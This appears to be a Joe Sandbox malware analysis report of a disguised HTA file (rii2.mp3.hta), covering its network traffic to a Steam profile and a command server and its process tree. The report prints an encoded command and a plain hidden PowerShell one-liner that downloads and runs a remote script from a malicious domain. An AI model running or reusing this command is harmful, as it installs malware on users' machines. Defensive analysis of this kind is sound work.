                                                                                      Date: Sun, 12 Jan 2025 16:25:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=22bd398ln1qoe0bpu6el5t3jk6; expires=Thu, 08 May 2025 10:12:02 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uoHlRDUFJVmI9wy2NfFnKBv9ewZ51I7%2FWb%2F4HXa9XsszXGROdUmoINXAmFCsG3icn4wL6NNxVAbGOOIvBjKICgnP8bGeOrMcl1oFWZTmN9Pk2OfCTa4zic6Mkfb%2B%2FCMj0zf1Ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 900e80932bbf4225-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1684&rtt_var=649&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1662870&cwnd=235&unsent_bytes=0&cid=0b8dd6e9aad5e49c&ts=483&x=0"
                                                                                      2025-01-12 16:25:24 UTC8INData Raw: 33 0d 0a 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 3ok
                                                                                      2025-01-12 16:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.649993104.102.49.2544432792C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-12 16:25:24 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Host: steamcommunity.com
                                                                                      2025-01-12 16:25:25 UTC1905INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Date: Sun, 12 Jan 2025 16:25:25 GMT
                                                                                      Content-Length: 35141
                                                                                      Connection: close
                                                                                      Set-Cookie: sessionid=2dfd14dd93d985f27fabede4; Path=/; Secure; SameSite=None
                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                      2025-01-12 16:25:25 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                      2025-01-12 16:25:25 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                      Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                      2025-01-12 16:25:25 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                      Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                                                      2025-01-12 16:25:25 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                                      Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.649994104.21.14.2334432792C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-12 16:25:25 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: misha-lomonosov.com
                                                                                      2025-01-12 16:25:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2025-01-12 16:25:26 UTC1135INHTTP/1.1 200 OK
                                                                                      Date: Sun, 12 Jan 2025 16:25:26 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=e2e06r6skkr2r1fcq1ubq6cuat; expires=Thu, 08 May 2025 10:12:05 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhydQ3R79Rh7mTSEoevd6SLelUeA62t7cA8VXHQ%2B5JMjpcY8gCKunSx10s%2B%2F0y7hi%2FuLkFcVCHA%2B1RuFyo%2B1e4jxPPcvKNNKyir62t9oZ7moY07TTXP%2FW6RS7JFekVpvPbwBxguJ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 900e80a209928ce9-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1783&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1563169&cwnd=231&unsent_bytes=0&cid=ae5f19ca734dc49b&ts=453&x=0"
                                                                                      2025-01-12 16:25:26 UTC8INData Raw: 33 0d 0a 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 3ok
                                                                                      2025-01-12 16:25:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:11:23:59
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta"
                                                                                      Imagebase:0xb70000
                                                                                      File size:13'312 bytes
                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:11:24:00
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
                                                                                      Imagebase:0x10000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:11:24:00
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:11:24:01
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))"
                                                                                      Imagebase:0x10000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:11:24:01
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:11:24:18
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                      Imagebase:0x7ff642ec0000
                                                                                      File size:21'312 bytes
                                                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:11:25:22
                                                                                      Start date:12/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                      Imagebase:0x10000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.2148212839.0000000006530000.00000010.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_6530000_mshta.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction ID: c1360d70cee7b593a103b4a82f858e56e33a116733507c586e89e75ed7d8cdb6
                                                                                        • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 82c9dc8e895e1efe5b5f65052337d444595805dfdad716f2d65e0f96ba8013b4
                                                                                        • Instruction ID: d4c02f727540c7aa88f100b308843baf6f099b190f8c9fe79c9976055dc0c43e
                                                                                        • Opcode Fuzzy Hash: 82c9dc8e895e1efe5b5f65052337d444595805dfdad716f2d65e0f96ba8013b4
                                                                                        • Instruction Fuzzy Hash: 7E523934B10218CFEB24DB28C855B6EBBB2BF89304F1581A9D8459B395DF74AD82CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bdc884eba84ebf51a5a00dd19ce4e2011e7e0d83cde467a6aa7908561938a1c3
                                                                                        • Instruction ID: 0e86a5a41131f4158d740ad82b24f68fd95f7b199681941bdfea4e2632578df4
                                                                                        • Opcode Fuzzy Hash: bdc884eba84ebf51a5a00dd19ce4e2011e7e0d83cde467a6aa7908561938a1c3
                                                                                        • Instruction Fuzzy Hash: 7C918D74A00605CFCB15CF59C5989AEFBB1FF48310B2486AAD915AB3A5C735FC51CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: adfd760dc3374053d0904eedcc0a1d21fa81e21c175c3a1069be4dc1adf69121
                                                                                        • Instruction ID: be6a008c39f332dd8b4aa45dc06fcea9c58ca3c86e6e4a1496bc3c05cd5e6cc2
                                                                                        • Opcode Fuzzy Hash: adfd760dc3374053d0904eedcc0a1d21fa81e21c175c3a1069be4dc1adf69121
                                                                                        • Instruction Fuzzy Hash: 88518B30B003189FDB24CF68D850BAEBBB2FF89300F1181AAD9459B355DB71AD41CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 111abd656edb5480c3213d41e17a5aaafce6cfee79cdc3de55312efdb70f8171
                                                                                        • Instruction ID: a655901040850d487525a4278cd83c42a6acd9e4b7ee8b6092c7d03d4a7d2bac
                                                                                        • Opcode Fuzzy Hash: 111abd656edb5480c3213d41e17a5aaafce6cfee79cdc3de55312efdb70f8171
                                                                                        • Instruction Fuzzy Hash: CB516834A00315CFDB24CF68C850BADBBB2FF89300F16819AD9459B3A5DB75AD52CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3341c709531880f8767deebada26e51eec603b1846c8d3e98581de815d25569
                                                                                        • Instruction ID: a32bd2f819de87e4557d3a40026b9a423fc72acf70e4c85ef12bb951249b149e
                                                                                        • Opcode Fuzzy Hash: b3341c709531880f8767deebada26e51eec603b1846c8d3e98581de815d25569
                                                                                        • Instruction Fuzzy Hash: FF417A74A00605DFCB05CF49C5989AEFBB1FF48310B1185AAD916AB364C772FC61DBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2131241082.00000000044A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_44a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1492e18c68f97387a5f0d0bdb40430a7db1f6880d20eda01903ab46be6981f85
                                                                                        • Instruction ID: 294c617b9f90d64acea24cf0d0c025afb7769e870fad89570f035f16e2e3723e
                                                                                        • Opcode Fuzzy Hash: 1492e18c68f97387a5f0d0bdb40430a7db1f6880d20eda01903ab46be6981f85
                                                                                        • Instruction Fuzzy Hash: 01012834604110CFDF06DF9CC890AEEBF70FF89320F10808AD150AB2A1C772A856CB61
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2130172067.000000000439D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0439D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_439d000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 12a6ef2e5aa94be15f645f71fcd67a1c27bcd17f82a6770da2da9bd7d83aa7fc
                                                                                        • Instruction ID: 756b30572752fffbf7280fdae40a350ccb3cc43a691e54d9402379400e50a1a0
                                                                                        • Opcode Fuzzy Hash: 12a6ef2e5aa94be15f645f71fcd67a1c27bcd17f82a6770da2da9bd7d83aa7fc
                                                                                        • Instruction Fuzzy Hash: 7101F272504344AAEB104E25ED80B66FFD8EF41324F08D51AED080B742DAB9AC41CAB1
                                                                                        Memory Dump Source
